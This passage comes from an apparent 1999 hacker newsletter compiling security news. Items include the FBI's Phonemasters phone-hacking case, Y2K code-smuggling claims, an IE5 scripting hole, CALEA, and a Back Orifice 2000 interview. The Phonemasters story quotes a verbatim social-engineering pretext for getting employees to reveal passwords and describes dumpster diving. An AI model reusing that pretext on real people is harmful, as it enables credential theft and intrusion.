Their customers included private investigators, so-called information brokers and -- by way of middlemen -- the Sicilian Mafia. According to FBI estimates, the gang accounted for about $1.85 million in business losses. "They could have -- temporarily at least -- crippled the national phone network. What scares me the most is that these guys, if they had had a handler, whether criminal or state-sponsored, could have done a lot of damage," says Morris. "They must have felt like cyber gods." Some may be still at large With the exception of Cantrell, none of the defendants in the Phonemasters case would comment on the matter. Others are thought to remain at large. This is the story of Cantrell and two accomplices largely put together from federal district court records and FBI interviews. Morris first learned of the group in August 1994, when he got a phone call from a Dallas private investigator, saying Cantrell had offered to sell him personal data on anyone he wished. He even offered a price list: Personal credit reports were $75; state motor-vehicle records, $25; records from the FBI's Crime Information Center, $100. On the menu for $500: the address or phone number of any "celebrity/important person." Morris immediately opened an investigation. Only 33-years-old at the time, he had taken an annual pay cut to join the FBI just five years earlier. He had been a tax consultant at Price Waterhouse, and despised the work. "I was young and making the big bucks, but every morning I would think 'God, I don't want to go to work.' " Tall, square-jawed and mustachioed, Morris began working on white-collar crimes when he arrived at the Dallas FBI field office. He took on a few hacker cases and realized he liked the challenge. "These guys are not the kind who'll rob the convenience store then stare right into the security camera," he says. "Trying to be the Sherlock Holmes of the Internet is hard when the fingerprints on the window can be so easily erased." 
     Morris convinced the private investigator to meet with Cantrell while wearing an audio taping device. After reviewing the tapes, he was certain that he was onto something big. He applied for and received court authority to place a digital number recorder on Cantrell's phone lines, which would log the numbers of all outgoing calls. It showed that Cantrell frequently dialed corporate telephone numbers for AT&T, GTE, MCI, Southwestern Bell and Sprint. Cantrell had also placed calls to two unlisted numbers at the White House, which further piqued Morris's interest.

     So, late that summer, Morris took an unprecedented step. He began writing a 40-page letter to the FBI's Washington headquarters, the Department of Justice and the federal district court in Dallas. Recording Cantrell -- now his central suspect -- while on the phone wasn't sufficient for the job that faced him, he believed. Instead, he needed new federal powers. He asked for Washington's permission to intercept the impulses that traveled along Cantrell's phone line as he was using his computer and modem.

     "It's one of the hardest techniques to get approved, partly because it's so intrusive," says Morris, who spent the next month or so consulting with federal authorities. "The public citizen in me appreciates that," he says. Still, the long wait was frustrating. "It took a lot of educating federal attorneys," he says.

     Once authorities said yes, Morris faced another obstacle: the equipment he needed didn't exist within the FBI. Federal investigators had experimented with a so-called data-intercept device only once before, in a New York hacker case a year earlier. It had failed miserably.

     Morris and technicians at the FBI's engineering lab in Quantico, Va., worked together to draft the specifications for the device Morris wanted. It would need to do the reverse of what a computer's modem does. A modem takes digital data from a computer and translates it to analog signals that can be sent via phone lines. Morris's device would intercept the analog signals on Cantrell's phone line and convert those impulses back to digital signals so the FBI's computers could capture and record each of a suspect's keystrokes.

     Alerting the victims

     While waiting for the FBI to fit him with the proper gear, Morris contacted several of the telephone companies to alert them that they had been victimized. The reception he got wasn't always warm. "It's kind of sad. Some of the companies, when you told them they'd had an intrusion, would actually argue with you," he said.

     GTE was an exception. Morris discovered that Bill Oswald, a GTE corporate investigator, had opened his own Phonemasters probe. Oswald and Morris began working together and uncovered another of Cantrell's schemes: he and some friends had managed to get their hands on some telephone numbers for FBI field offices. They entered the telephone system and forwarded some of those FBI telephones to phone-sex chat lines in Germany, Moldavia and Hong Kong. As a result of the prank, the FBI was billed for about $200,000 in illegal calls.

     Morris also learned that on Oct. 11, 1994, Cantrell hacked GTE's computer telephone "switch" in Monticeto, Calif., created a fake telephone number and forwarded calls for that number to a sex-chat line in Germany. The FBI isn't sure how Cantrell convinced people to call the number, but court records show that Cantrell received a payment of $2,200 from someone in Germany in exchange for generating call traffic to the phone-sex service.

     In early December 1994, Morris's "analog data-intercept device" finally arrived from the FBI's engineering department. It was a $70,000 prototype that Morris calls "the magic box." On Dec. 20, Morris and other agents opened up their surveillance in an unheated warehouse with a leaky roof. The location was ideal because it sat between Cantrell's home and the nearest telephone central office.
     Morris and nine other agents took turns overseeing the wiretap and data intercepts. The agents often had to pull a tarp over their workspace to keep rain from damaging the costly equipment.

     As middle-class families go, the Cantrells seem exemplary. Calvin's father, Roy, was a retired detective who had once been voted "Policeman of the Year" in Grand Prairie, the suburb west of Dallas where they live. His mother, Carol, taught Latin and English at Grand Prairie High School, where Calvin graduated in 1987 with above-average grades. As a student, he was no recluse. He had a small circle of friends who shared his love of martial arts, video games and spy movies. Cantrell's longtime friend, Brandon McWhorter, says Calvin was always a fun-loving guy, but there was one thing about which he was very serious. "He would always talk to me about religion," McWhorter says. "He held very strong religious beliefs."

     After high school, Cantrell continued to live at home while taking classes at the University of Texas at Arlington and a local community college. He held a series of odd jobs and hired himself out as a deejay for weddings and corporate parties. Cantrell balanced school, work, family and friends even as he began hacking more often. His parents became suspicious, but said nothing. The family had three phones; Calvin stayed on his 15 hours a day.

     "They'd go in my room and see all the notes and the phone numbers. Even though they couldn't put it together technically, they knew something was up," says Cantrell. "They were kind of in denial. ... My parents were pretty soft."

     Mrs. Cantrell says Calvin had been so well-behaved that she never suspected his computer activities were more than fun and games. "I wish I had known what was going on. Unfortunately, my son was smarter than I was." (Calvin's father passed away last year.)

     The hack

     At 8:45 on the night of Dec. 21, just four days before Christmas, Cantrell went online.
     Using an ill-gotten password, he entered a Sprint computer, where he raided a database, copying more than 850 calling-card access codes and other files, court records in the case show.

     The Phonemasters often got passwords and other key information on companies in a low-tech approach called "Dumpster diving," raiding the trash bins of area phone firms for old technical manuals, phone directories and other company papers. This often allowed Cantrell to run one of his favorite ruses -- passing himself off as a company insider. "I'd call up and say, 'Hi, I'm Bill Edwards with systems administration.' ... I'd chat with them for a while, then I'd say 'We're doing some network checkups today. Can you log off of your computer, then tell me every character you're typing as you log back on?' A lot of people fell for that," Cantrell says.

     After hacking into the Sprint database that evening, Cantrell talked to another hacker, Corey Lindsley, over the phone. He'd "met" Lindsley, and another hacker, John Bosanac, in 1993 while surfing the murky world of hacker bulletin boards. Cantrell then sent the copied files to Lindsley, who was a student at the University of Pennsylvania in Philadelphia.

     Morris's equipment captured everything -- voice and data. It was an FBI first. "We're sitting in this place that looked like a bomb pit, but the atmosphere was really exciting," says Morris. "We were ecstatic."

     As the days passed, the FBI wiretap generated stacks upon stacks of audiotapes and data transcripts. Some of it was just idle talk among friends, the occasional call to finalize dinner plans, lots of workaday chatter. But the incriminating evidence mounted. "It's great, you know. I really love fraud," joked Bosanac, a Californian who was musing with Cantrell about the various technical methods of using other people's cellular telephone accounts to place free calls. "Fraud is a beautiful thing."

     Family conversations even entered the investigation. On Jan. 7, for instance, Cantrell called his mother from a friend's house and asked her to find an MCI manual on his shelf. He then asked her to read him a set of directions for accessing MCI's V-NET computer system. Mrs. Cantrell read the material but asked her son whether he was supposed to have the book, citing warnings that stated its contents were restricted to MCI employees. Cantrell just avoided his mother's question. The FBI data-tap captured every word.

     Taking a toll

     Still, the process took its toll on the FBI team, especially coming during the holidays. "It was stressful that the wiretap was going 24 hours a day, seven days a week. I had to write up the legal documents, and it's tough making people work through Christmas," Morris said. On top of that, he had to keep records of his findings, and every 10 days he had to reapply to the court to prove that his wiretap was yielding evidence.

     By late January, the FBI had begun to get a clear profile of Cantrell and his hacker friends. Lindsley, it appeared, was the group's acerbic leader, directing much of the hacking activity. Over phone lines, the FBI heard him bragging about how he had given a Pennsylvania police department "the pager treatment" in retaliation for a speeding ticket he received. Lindsley had caused the police department's telephone number to appear on thousands of pagers across the country. The resulting flood of incoming calls, Lindsley bragged, would surely crash the department's phone system.

     They also enjoyed collecting information about film stars, musicians and other famous people. Cantrell has admitted that he broke into President Clinton's mother's telephone billing records in Arkansas to obtain a list of unpublished White House numbers. The men, says the FBI, even made harassing phone calls to rock star Courtney Love and former child actor Danny Bonaduce using pilfered numbers.

     They weren't without fear of getting caught. On the evening of Jan. 17, for instance, there was a clicking on the phone line as Bosanac, Cantrell, and Lindsley shared a three-way conference call. "What the hell happened?" asked Bosanac, according to an FBI transcript of the conversation. "That was the FBI tapping in," laughed Cantrell. "Do you know how ironic that's gonna be when they play those tapes in court?" Lindsley said. "When they play that tape in court and they got you saying it was the FBI tapping in?"

     On Jan. 18, the FBI overheard Cantrell, Bosanac and Lindsley on another conference call. With the other two men giving directions, Cantrell dialed his computer into Southwestern Bell's network and copied a database of unlisted phone numbers. The three men then discussed plans to write a computer program that could automatically download access codes and calling-card numbers from various telephone systems. They also talked about the chance that the FBI would one day track them down. "Just remember, nobody f-- rats anybody out," said Lindsley to the others. "No deals." "Yeah, no deals is right," replied Bosanac. "No deals. I'm serious. I don't care what your f-- lawyers tell you," said Lindsley. Cantrell said nothing.

     Transferred codes to Canada

     Later that morning, between 5:09 and 7:36, Cantrell entered Sprint's computer system and downloaded about 850 Sprint calling-card codes. He then transferred those codes to a man in Canada. The codes would allow anyone who purchased them to place free international phone calls. Morris would later learn that a contact in Canada paid Cantrell $2 apiece for each code, court records show. The Phonemasters most likely did not know -- or care -- where the codes ended up, but the FBI traced them and found some ended up in the hands of a Sicilian Mafia operative in Switzerland.

     On Jan. 23, while probing a U S West telephone database, Cantrell, Bosanac, Lindsley and others stumbled over a list of telephone lines that were being monitored by law enforcement.
     On a lark, they decided to call one of the people -- a suspected drug dealer, says Morris -- and let him know his pager was being traced by the police.

     On Jan. 27, the group was clearly feeling paranoia about being caught, prompting Lindsley to tell his accomplices to pull as many Sprint codes as quickly as they could. Cantrell began to have reservations. "What if I stopped before all of y'all?" Cantrell asked Lindsley. "Would you applaud my efforts?" "No," said Lindsley. "I don't think there's any reason to stop. What are you worried about?" "Uh, I'm not worried about anything. I'm just saying, uhm. There might ... there might come a time here where I don't have time for this." He added a little later: "I, you know, really like it. But, I don't know, I just ... Eventually, I don't see myself doing a lot of illegal things."

     Lindsley continued to prod Cantrell to speed up the download of stolen codes by spending more time online and using two phones. "I'm telling you, you run two lines around the clock," Lindsley said. "You can't run them around the clock," said Cantrell. "Why not?" "Oh, come on. I think that's pushing it too hard." "I think you just got a weak stomach there, boy."

     Tension rises

     By late February, things began to get tense. One of Cantrell's hacker friends informed him that his number had shown up in a database of phone numbers being monitored by the FBI. In all the excitement of burglarizing databases and rerouting phone calls, the Phonemasters had neglected to check their own phone lines for any signs that law enforcement might be listening in. Morris hastily arranged for an FBI raid. On Feb. 22, 1995, agents raided Cantrell's home, Lindsley's college dorm room, and burst into Bosanac's bedroom in San Diego.

     For Morris, the climactic raid was only the start of a long battle to bring the hackers to justice. Because of the complicated nature of his evidence gathering, it took him more than two years to compile the most salient portions of the wiretap transcripts and data-tap evidence. "All the documents and tapes from this case could fill a 20-by-20 room," Morris explains. "And at the time, I was the only computer investigator for all of Texas."

     In the meantime, as federal prosecutors slowly geared up for a trial, Cantrell tried to get on with his life. "I spent the first few weeks after the raid being paranoid and wondering what would happen," he says. Occasionally, Morris and other agents would call him, asking questions about some of the systems he had hacked. By the summer of 1995, at the urging of his mother, Cantrell started attending church again. He scored the first in a string of professional computing jobs, doing systems-administration work for a company called Lee Datamail in Dallas. He neglected to tell his employers about the FBI case. "It's been mental torture for the last four years, not knowing," says Cantrell. "Can I go to school, move to another state? That kind of thing messes with your head."

     Over time, Cantrell says, he had come to seriously regret what he had done, and the $9,000 he says he made from selling codes wasn't worth the trouble. "Looking back, it was all crazy. It was an obsession. I wanted to see how much I could conquer and a little power went to my head." Cantrell notes that he has since tried to make amends, even helping the phone companies plug their security holes and helping the FBI gather more information on some of the group's members who haven't yet been apprehended.

     The matter finally seemed near conclusion this March when Morris was able to play "a couple of choice tapes" in separate meetings with Cantrell, Bosanac and Lindsley. Afterward, all three agreed to plead guilty to federal charges of one count of theft and possession of unauthorized calling-card numbers and one count of unauthorized access to computer systems.
     Chief Judge Jerry Buchmeyer ordered a presentencing investigation. During a hearing on the matter, Lindsley's attorney tried to argue that the FBI had wildly overstated the $1.85 million in losses that her client's hacking had allegedly caused. But in the end, Judge Buchmeyer rejected the argument and sentenced him to 41 months in prison. Bosanac, in the meantime, has asked that his sentencing hearing be moved to San Diego, where he lives. As for Cantrell, Judge Buchmeyer lauded his "acceptance of guilt." He could have been sentenced to three years in federal prison; instead he was given two. He reports to federal prison in January of next year.

     Morris, meanwhile, has used his data-tap method in several other cases; he also travels around the country and the world advising law-enforcement agencies on how to conduct state-of-the-art investigations of hacker crimes.

     @HWA

52.0 INDIA RESPONDS TO Y2K ACCUSATIONS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From Help Net Security
     http://www.net-security.org/
     by Thejian, Saturday 2nd October 1999 on 2:45 pm CET

     Indian firms have done more than $2 billion worth of coding work to protect old computers from the Y2K problem, but accusations are made by some that India and Israel appear to be the "most likely sources" of malicious code. Indian officials yesterday reacted to these claims, speaking of it as a ridiculous suggestion.

     Indian reaction
     http://www.wired.com/news/news/politics/story/22041.html

     India: Code-Smuggling? Absurd
     Reuters
     11:45 a.m. 1.Oct.99.PDT

     Indian officials Friday slammed as ridiculous a suggestion by US officials that Indian Y2K (Year 2000) software firms could have been used to smuggle in computer codes aimed at threatening Washington's security.

     Michael Vatis, the top cyber cop in the Federal Bureau of Investigation, told Reuters Thursday that malicious code changes under the guise of Y2K modifications had begun to surface in some US work undertaken by foreign contractors.
     The claim signaled possible economic and security threats. Vatis, who heads the National Infrastructure Protection Center (NIPC), gave no details. But Terrill Maynard, a Central Intelligence Agency officer assigned to the NIPC, said in a recent article that India and Israel appeared to be the "most likely sources" of malicious code. The article appeared in the June issue of Infrastructure Protection Digest.

     "I think this is an utterly ridiculous assertion ... without, as far as I can see, any basis whatsoever," said Montek Singh Ahluwalia, chairman of the Indian government's Y2K Action Force. "I have no idea if this report is factually correct and if indeed a responsible officer has made what appears to be an irresponsible statement," Ahluwalia told Reuters. He said the Indian government had not received any official communication to suggest wrongdoing by Indian firms or agencies.

     The CIA declined to comment on Maynard's article. Referring to it, Vatis said: "This is our effort to put out in the public information that hopefully can be useful to people."

     Indian firms have done more than $2 billion worth of coding work to protect old computers whose date-fields denoted years only by the last two digits. Unless rectified, such computers can cause valuable data crashes when the year 2000 dawns. India and Israel have had differences with the United States on security matters, particularly on nuclear policy.

     Dewang Mehta, president of India's National Association of Software and Service Companies (NASSCOM), cited several reasons to dismiss suggestions Indian firms may be a security threat. He told Reuters that too much was at stake for India's booming software companies, which have used Y2K as a strategy to gain long-term clients. Besides, Indian firms did the bulk of Y2K work at US sites under client supervision, he added. "We cannot visualize that any moles have been planted. This is absurd. For us, too much is at stake," Mehta said. He said Indian firms had also carried out "regression testing," which was aimed at ensuring Y2K programming work did not hamper other software in client systems.

     Vatis said it was "quite easy" for an outsider to code in ways of gaining future access or causing something to "detonate" down the road. This could expose a company to future "denial of service attacks," open it to economic espionage, or leave it vulnerable to malicious altering of data, he said. Vatis said that so far "not a great deal" of Y2K-related tampering had turned up. But a US Senate panel said last week that long-term consequences of using foreign firms for Y2K work could include more espionage and reduced information security.

     Mehta said he heard during a recent visit to Israel a rumor about a computer virus designed to wipe out Y2K solutions. "I am afraid as only three months are left and many American systems are not compliant, this kind of global rumor-mongering is beginning to happen," he said. "We all think we should guard ourselves against it. NASSCOM strongly condemns such rumors."

     Maynard noted Ireland, Pakistan, and the Philippines among nations whose firms did significant Y2K repair. He said they were "least likely" to harm US systems but did not rule out threat possibilities.

     Copyright 1999 Reuters Limited.

     @HWA

53.0 ANOTHER IE 5.0 HOLE EXPOSED
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From Help Net Security
     http://www.net-security.org/
     by Thejian, Friday 1st October 1999 on 10:20 am CET

     Oh swell, here's another Internet Explorer hole for you. The latest problem can occur through a download file link in HTML. The bogus link can open a path to your computer. This bug also bypasses firewalls to access PCs. Once again, turn off the scripting, people!

     ZDNet report on it
     http://www.zdnet.com/zdnn/stories/news/0,4586,2344472,00.html

     --------------------------------------------------------------
     This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
     --------------------------------------------------------------

     IE 5.0 security hole exposed
     By Peter Deegan, Help Channel
     September 30, 1999 8:02 AM PT
     URL: http://www.newslinx.com/

     Every time you look there's another security breach found in Microsoft Internet Explorer 5.0. Like many of these problems there are no reports of it being used maliciously yet, but now that the details are out, the chances of someone making use of the information grow.

     This latest problem can occur through what appears to be a download file link on a Web page, newsgroup message or HTML e-mail message. The bogus download link can open a path to your computer, through which it's possible to read files on your computer. You don't need to click on the link to be affected because it is possible to automatically activate the link when you view the Web page or e-mail message. The problem is in the Active Scripting component of Microsoft (Nasdaq:MSFT) Internet Explorer 5. Working behind a corporate firewall or proxy is no protection from this security hole.

     What can you do about it? There's no patch available for the problem, though Microsoft has issued a security alert and is working on the problem now. In the meantime you can protect yourself by switching off the Active Scripting component. In Internet Explorer 5, select Tools | Internet Options, then click on the Security tab. Select the Internet Zone, then click on the "Custom Level" button. Scroll down to the "Scripting" heading, find the "Active Scripting" entry and change it to "Disable." Click OK.

     Keep in mind, this temporary fix may do you more harm than good. Scripting is used by many Web sites, and it's possible that some service on a Web page won't work once you turn scripting off. The best example of this is the Windows Update option in IE5 itself; this is the easiest way to update the browser with security patches and other new features. So if you turn off Scripting in IE5 you won't be able to use the Windows Update option to get the update to fix Scripting. Catch 22!

     You could change the Scripting setting to "Prompt," which means you'll get a warning when you go to a Web page that has a scripting component. The problem with this is that the prompt gives you no indication of what the scripting will do, so you're asked to make a decision with no information.

     While the risk in the short term of this problem is relatively low, you can switch off scripting if you're concerned -- but keep in mind the consequences. Remember to turn scripting back on when using Tools | Windows Update to check for an update. Let's hope the security patch for this problem arrives soon.

     @HWA

54.0 TELECOM INDUSTRY DECRIES DIGITAL WIRETAP DEADLINE
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From Help Net Security
     http://www.net-security.org/
     by Thejian, Friday 1st October 1999 on 9:50 am CET

     Key members of the U.S. telecommunications industry complained this week that a government deadline for compliance with a new digital wiretapping law is "unrealistic." Matthew Flanigan, president of the Telecommunications Industry Association (TIA), warned that "Calea compliance involves one of the most complicated sets of features ever developed by manufacturers." To comply, Flanigan said, manufacturers must develop software interfaces for hundreds of network elements without bringing down telecom networks.

     Full story
     http://www.eet.com/story/OEG19990929S0022

     Telecom industry decries digital wiretap deadline
     By George Leopold
     EE Times
     (09/29/99, 2:24 p.m. EDT)

     WASHINGTON — Key members of the U.S. telecommunications industry complained this week that a government deadline for compliance with a new digital wiretapping law is "unrealistic."
     While praising the Federal Communications Commission (FCC) for finally issuing guidelines to implement the controversial wiretap law — the Communications Assistance for Law Enforcement Act (Calea) — a trade group here charged with developing standards said a Sept. 30, 2001, deadline for compliance is too soon.

     Matthew Flanigan, president of the Telecommunications Industry Association (TIA), warned that "Calea compliance involves one of the most complicated sets of features ever developed by manufacturers." The FCC decision "will only add to the complexity and difficulty," he said. To comply, Flanigan said, manufacturers must develop software interfaces for hundreds of network elements without bringing down telecom networks.

     In issuing its final order earlier this week, the FCC designated the industry group as the standards-setting body for converting myriad legal decisions about the wiretap law into technical standards needed by manufacturers to comply with the 1994 law.

     @HWA

55.0 FED COMPUTER SECURITY BILL HAS STRONG SUPPORT
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From Help Net Security
     http://www.net-security.org/
     by Thejian, Friday 1st October 1999 on 9:25 am CET

     A House bill aimed at beefing up computer security in civilian federal agencies received a broad endorsement from government and high-tech industry leaders today. Not only would H.R. 2413, The Computer Security Enhancement Act of 1999, provide much needed security guidance to non-military federal agencies, it could help beef up private-sector computer security by providing the public with a list of government-approved security devices, National Institute of Standards and Technology (NIST) Director Raymond Kammer said yesterday. The legislation appears to have strong support in the Subcommittee on Technology after a hearing on the matter yesterday.

     Newsbytes
     http://www.newsbytes.com/pubNews/99/137105.html

     Fed Computer Security Bill Has Strong Support
     By David McGuire, Newsbytes
     WASHINGTON, DC, U.S.A., 30 Sep 1999, 3:56 PM CST

     A House bill aimed at beefing up computer security in civilian federal agencies received a broad endorsement from government and high-tech industry leaders today.

     Not only would H.R. 2413, The Computer Security Enhancement Act of 1999, provide much needed security guidance to non-military federal agencies, it could help beef up private-sector computer security by providing the public with a list of government-approved security devices, National Institute of Standards and Technology (NIST) Director Raymond Kammer said today.

     Kammer spoke at a hearing on H.R. 2413 held by the House Science Committee's Subcommittee on Technology. The legislation appears to have strong support in the Subcommittee.

     "Despite the money, manpower and management priority we've exerted on the Y2K problem, I believe a lack of adequate computer security protection in our federal agencies has the potential to dwarf the millennium bug in scope and magnitude," Subcommittee Chairwoman Constance Morella, R-Md., said in prepared remarks today.

     Among other things, H.R. 2413 would require NIST to serve as a computer security consultant for other federal agencies. In that role NIST would advise agencies on what "off-the-shelf" computer security products met with the government's approval. NIST would provide that list of approved products to the public as well.

     The bill also requires the Under Secretary of Commerce to establish a "clearinghouse of information" on computer security threats and to make that list available to the public.

     If passed, the bill will "get civilian agencies to pay more attention to information security," said Information Technology Association of America President Harris Miller after today's hearing.
     In addition to its computer security provisions, the bill also establishes a new, NIST-administered computer science fellowship program for students studying computer security.

     Reported by Newsbytes.com, http://www.newsbytes.com. 15:56 CST

     @HWA

56.0 JUSTICE DEPT. TO FUND ANTIHACKING CAMPAIGN
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From Help Net Security
     http://www.net-security.org/
     by Thejian, Friday 1st October 1999 on 9:15 am CET

     In March, the Cybercitizen Partnership was announced, an awareness campaign coordinated by the Information Technology Association of America. The US Justice Department will provide $300,000 in funding for the Cybercitizen Partnership and so, according to this article, will assume the unusual role of helping to educate budding Web users about how to be responsible, law-abiding surfers. Hallelujah.

     http://www.thestandard.net/articles/display/0,1449,6711,00.html?home.tf

     Justice Dept. Funds Antihacking Campaign
     By Keith Perine

     WASHINGTON – The Justice Department is trying to save children before they turn into hackers. With its $300,000 funding of the Cybercitizen Partnership, an awareness campaign coordinated by the Information Technology Association of America, the Justice Department assumes the unusual role of helping to educate budding Web users about how to be responsible, law-abiding surfers.

     The Cybercitizen Partnership, announced in March, is a joint Justice-ITAA effort aimed at protecting the country's Internet infrastructure from outlaw hackers and other criminals. Faced with a security breach, law enforcement officials don't know at first if they're confronting a foreign terrorist, a college student or a couple of sixth-graders who are having some fun with Dad's computer. But an ITAA official said that, upon investigation, a surprising number of cases involve child hackers.

     The association says that information technology makes up about 6 percent of the global gross domestic product – some $1.8 trillion of electronic infrastructure that needs to be protected against disgruntled former employees, corporate spies and juvenile delinquents who like to pull pranks. Figuring that it's too late to reform terrorists and spies, the ITAA decided to concentrate on the kids.

     The campaign, which debuts in January, will initially target children 12 and under, aiming to teach them proper online behavior and to instill a healthy disdain for hacking. The association wants to "help weed out some of the less meaningful system violations by curious children so that law enforcement can focus on the true criminals," says ITAA President Harris Miller.

     The cash infusion from the Justice Department is in keeping with a long tradition of government-sponsored public education campaigns, from the Interior Department's Smokey the Bear messages against forest fires to the Drug Enforcement Administration's "Just Say No" war on drugs.

     Miller says the campaign could be expanded to educate kids about other aspects of proper Internet etiquette, such as warning them against sending spam – for kids, the modern-day equivalent of prank telephone calls – or visiting Web sites with adult content. The main focus of the campaign, however, will be to "send the message that hacking isn't cute, clever or funny."

     In addition to the funding from Justice, the ITAA also plans to pass the hat among its own membership, a who's-who list of the high-tech industry that includes Microsoft (MSFT), America Online (AOL) and IBM (IBM). The association will also seek funds from foundations and possibly from private individuals. The association has sent out a request to several public relations companies for ideas on how to run the campaign, which might include television and Internet advertising, brochures and even visits to schools.
One possibility under consideration: the creation of a mascot, like the famous McGruff crime dog, to pass the message along in a friendly manner. @HWA 57.0 COURT TO REVISIT CRYPTO RULING ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 1st October 1999 on 9:01 am CET A U.S. federal appeals court will reexamine a trial court's decision to lift U.S. government restrictions on the export of encryption technology. The 9th U.S. Circuit Court of Appeals withdrew a May decision by a panel of three of its judges, which had endorsed the trial court ruling. In May, the panel of 9th Circuit judges concluded that the federal government could not limit professor Daniel J. Bernstein's efforts to distribute encryption software. Read more http://news.cnet.com/news/0-1005-200-424043.html?tag=st.ne.1002.bgif.1005-200-424043 Court to revisit encryption ruling By Bloomberg News Special to CNET News.com September 30, 1999, 1:30 p.m. PT SAN FRANCISCO--A U.S. federal appeals court will reexamine a trial court's decision to lift U.S. government restrictions on the export of encryption technology. The 9th U.S. Circuit Court of Appeals withdrew a May decision by a panel of three of its judges, which had endorsed the trial court ruling. That indicates that a majority of the active 9th Circuit judges have reservations about the opinion or feel the encryption issue is significant enough to be revisited. In May, the panel of 9th Circuit judges concluded that the federal government could not limit professor Daniel J. Bernstein's efforts to distribute encryption software. Many companies, such as Network Associates, have been prevented by U.S. law from selling data-scrambling technology overseas. Earlier this month, it was reported that the Clinton administration is easing restrictions on data-scrambling technology, clearing the way for Network Associates and other companies to sell the hardest-to-crack encryption technology. 
Copyright 1999, Bloomberg L.P. All Rights Reserved. @HWA 58.0 DRAM ROBBERIES ~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 1st October 1999 on 8:40 am CET Dane-Elec (UK) warned fellow memory distributors to keep DRAM under surveillance following a robbery at their warehouse. The Surrey-based distributor said it was broken into at 2am yesterday morning. But the robbers were disturbed by a security guard and got away with less kit than they intended. 128MB and 64MB modules were stolen. Though the value wasn't disclosed, the company said it was small, and less than a tenth of the company’s stock. Word on the street is that this could be anything between £1 million and £3 million. The Register http://www.theregister.co.uk/ @HWA 59.0 DON'T BLAME BO FOR SECURITY PROBLEMS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Thursday 30th September 1999 on 9:30 am CET CNN spoke to Bruce Schneier about the BackOrifice remote administration tool. According to him, "Back Orifice will be used by lots of unethical people to do all sorts of unethical things, which is not good." But he also mentions some other things people should take to heart, programs as pcanywhere are as much "evil hacking tools" as BO. Microsoft responds to security threats only if they are demonstrated. Explain the threat in an academic paper and Microsoft denies it; release a hacking tool like Back Orifice and suddenly they take the vulnerability seriously. CNN http://cnn.com/TECH/computing/9909/29/back.orifice.idg/index.html Don't blame Back Orifice for security problems September 29, 1999 Web posted at: 10:50 a.m. EDT (1450 GMT) by Ann Harrison (IDG) -- BackOrifice is a remote administration tool for Microsoft Windows and, as Bruce Schneier, chief technology officer at San Jose-based managed security services firm Counterpane Internet Security Inc. 
(link below), points out, "one of the coolest hacking tools ever developed." Computerworld reporter Ann Harrison spoke with him recently about the tool, which he insists has gotten an undeservedly bad reputation. Back Orifice 2000 (BO2K) is free, open source and available at www.bo2k.com (link below). Q: How does BO2K work? A: There are two parts: a client and a server. The server is installed on the target machine. The client, residing on another machine anywhere on the Internet, can now take control of the server. This is actually a legitimate requirement. Perfectly respectable programs, like pcAnywhere or Microsoft Systems Management Server [SMS], do the same thing. They allow a network administrator to remotely troubleshoot a computer. If the server is installed on a computer without the knowledge or consent of its owner, the client can effectively "own" the victim's PC. Q: Why has BO2K acquired a reputation as only a hacker's tool? A: Back Orifice's difference is primarily marketing spin. Since it was written by hackers, it is evil. That's wrong; pcAnywhere is just as much an evil hacking tool as Back Orifice. Not only can the client perform normal administration functions on the server's computer -- upload and download files, delete files, run programs, change configurations, take control of the keyboard and mouse, see whatever is on the server's screen -- but it can also do more subversive things: reboot the computer, display arbitrary dialog boxes, turn the microphone or camera on and off, capture keystrokes and passwords. And there is an extensible plug-in language for others to write modules. Q: How does BO2K run in stealth mode? A: Unless the server's owner is knowledgeable (and suspicious), he will never know that Back Orifice is running on his computer. Other remote administration tools, even SMS, also have stealth modes. Back Orifice is just better at it. 
Because Back Orifice is configurable, because it can be downloaded in source form and then recompiled to look different... I doubt that all variants will ever be discovered. BO2K's slogan is "show some control," and many will take that imperative seriously. Back Orifice will be used by lots of unethical people to do all sorts of unethical things. And that's not good.

Q: Back Orifice can't do anything until the server portion is installed on some victim's computer, right?

A: Yes. This means that the victim has to commit a security faux pas before anything else can happen. Not that this is very hard -- lots of people network their computers to the Internet without adequate protection. Still, if the victim is sufficiently vigilant, he can never be attacked by Back Orifice.

Q: What about Microsoft?

A: One of the reasons Back Orifice is so nasty is that Microsoft doesn't design its operating systems to be secure. It never has. In Unix, an attacker would first have to get root privileges. Not in Windows. There's no such thing as limited privileges or administrator privileges or root privileges. This might have made some sense in the age of isolated desktop computers. But on the Internet, this is absurd. There are provisions to make Windows NT a very secure operating system, such as privilege levels in separate user accounts, file permissions and kernel object access control lists. You have to make 300-plus security checks and modifications to Windows NT to make it secure. Microsoft refuses to ship the [operating system] in that condition. Malicious remote administration tools are a major security risk. What Back Orifice has done is made mainstream computer users aware of the danger. There are certainly other similar tools in the hacker world -- one, called BackDoor-G, has recently been discovered -- some developed with much more sinister purposes in mind. Microsoft responds to security threats only if they are demonstrated.
